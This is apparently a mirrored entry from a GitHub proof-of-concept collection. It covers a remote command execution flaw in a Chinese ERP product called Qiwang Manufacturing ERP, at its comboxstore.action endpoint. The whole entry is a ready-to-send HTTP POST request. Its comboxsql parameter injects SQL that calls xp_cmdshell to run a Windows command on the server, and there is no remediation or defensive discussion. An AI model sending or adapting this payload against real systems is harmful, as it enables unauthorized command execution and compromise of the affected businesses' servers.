mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
10 lines
251 B
Markdown
10 lines
251 B
Markdown
## 企望制造 ERP comboxstore.action 远程命令执行漏洞
|
|
```
|
|
|
|
POST /mainFunctions/comboxstore.action HTTP/1.1
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Host: xxx.xxx.xxx.xxx
|
|
|
|
comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
|
|
```
|